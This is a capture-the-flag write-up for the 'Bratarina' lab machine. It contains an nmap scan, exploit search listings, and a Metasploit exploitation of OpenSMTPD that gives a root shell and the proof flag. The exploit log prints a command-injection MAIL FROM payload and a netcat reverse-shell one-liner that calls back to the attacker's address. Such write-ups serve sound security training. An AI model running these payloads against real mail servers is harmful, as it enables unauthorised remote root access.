Bratarina

Intro

# Nmap 7.94SVN scan initiated Fri Mar 22 09:11:34 2024 as: nmap -sC -sV -vv -oA nmap/initial bratarina.pg
Nmap scan report for bratarina.pg (192.168.202.71)
Host is up, received echo-reply ttl 61 (0.040s latency).
Scanned at 2024-03-22 09:11:36 CDT for 51s
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE  SERVICE     REASON         VERSION
22/tcp  open   ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
|   256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp  open   smtp        syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello bratarina.pg [192.168.45.152], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
53/tcp  closed domain      reset ttl 61
80/tcp  open   http        syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
445/tcp open   netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 22038/tcp): CLEAN (Timeout)
|   Check 2 (port 53384/tcp): CLEAN (Timeout)
|   Check 3 (port 21897/udp): CLEAN (Timeout)
|   Check 4 (port 39979/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-03-22T14:11:53
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-03-22T10:11:52-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m35s, median: 1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 09:12:27 2024 -- 1 IP address (1 host up) scanned in 53.37 seconds

Open Ports

22/tcp - OpenSSH 7.6p1
25/tcp - OpenSMTPD
80/tcp - nginx 1.14.0
445/tcp - Samba smbd 4.7.6

OpenSMTPD Exploits

---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                                                        | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                                                    | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution                                    | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution                                                                         | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                                                           | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution                                        | openbsd/remote/48140.c
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Samba Exploits

---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                            | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                              | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                          | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                        | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                        | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                               | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                                                | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)                                         | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                                                   | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)                     | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                                                       | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                                                          | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                                           | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                                             | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)                    | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                                                      | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                                                      | linux/dos/27778.txt

Initial Foothold

msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > show options                                                                                    
                                                                                                                                                  
Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):                                                                                       
                                                                                                                                                  
   Name     Current Setting  Required  Description                                                                                                
   ----     ---------------  --------  -----------                                                                                                
   RCPT_TO  root             yes       Valid mail recipient                                                                                       
   RHOSTS   bratarina.pg     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html     
   RPORT    25               yes       The target port (TCP)                                                                                      
                                                                                                                                                  
                                                                                                                                                  
Payload options (cmd/unix/reverse_netcat):                                                                                                        
                                                                                                                                                  
   Name   Current Setting  Required  Description                                                                                                  
   ----   ---------------  --------  -----------                                                                                                  
   LHOST  192.168.45.152   yes       The listen address (an interface may be specified)                                                           
   LPORT  80               yes       The listen port                                                                                              
                                                                                                                                                  
                                                                                                                                                  
Exploit target:                                                                                                                                   
                                                                                                                                                  
   Id  Name                                                                                                                                       
   --  ----                                                                                                                                       
   0   OpenSMTPD 6.4.0 - 6.6.1                                                                                                                    
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
View the full module info with the info, or info -d command.                                                                                      
                                                             
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > run                                                                                             

[*] Started reverse TCP handler on 192.168.45.152:80 
[*] 192.168.202.71:25 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.202.71:25 - The service is running, but could not be validated.
[*] 192.168.202.71:25 - Connecting to OpenSMTPD
[*] 192.168.202.71:25 - Saying hello and sending exploit
[*] 192.168.202.71:25 - Expecting: /220.*OpenSMTPD/
[*] 192.168.202.71:25 - Sending: HELO Fu9Gr5sSrBNw0zZ2a
[*] 192.168.202.71:25 - Expecting: /250.*pleased to meet you/
[*] 192.168.202.71:25 - Sending: MAIL FROM:<;for l in M Q e 4 o v 1 D j E T t 8 M;do read l;done;sh;exit 0;>
[*] 192.168.202.71:25 - Expecting: /250.*Ok/
[*] 192.168.202.71:25 - Sending: RCPT TO:<root>
[*] 192.168.202.71:25 - Expecting: /250.*Recipient ok/
[*] 192.168.202.71:25 - Sending: DATA
[*] 192.168.202.71:25 - Expecting: /354 Enter mail.*itself/
[*] 192.168.202.71:25 - Sending: 
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/fnmudoa; nc 192.168.45.152 80 0</tmp/fnmudoa | /bin/sh >/tmp/fnmudoa 2>&1; rm /tmp/fnmudoa
[*] 192.168.202.71:25 - Sending: .
[*] 192.168.202.71:25 - Expecting: /250.*Message accepted for delivery/
[*] 192.168.202.71:25 - Sending: QUIT
[*] 192.168.202.71:25 - Expecting: /221.*Bye/
[*] Command shell session 1 opened (192.168.45.152:80 -> 192.168.202.71:42038) at 2024-03-22 10:06:00 -0500

whoami
root
pwd
/root
ls -la
total 28
drwx------  4 root root 4096 Mar 22 10:08 .
drwxr-xr-x 23 root root 4096 Jul  6  2020 ..
-rw-------  1 root root    0 Jul  9  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Jul  6  2020 .cache
drwx------  3 root root 4096 Jul  6  2020 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Mar 22 10:08 proof.txt
cat proof.txt
470915275876f89210c9911a6fa0c973

Privilege Escalation

No privilege escalation required as initial access gained by exploiting OpenSMTPD yielded root access.

PreviousRubyDome NextExghost

Last updated 1 year ago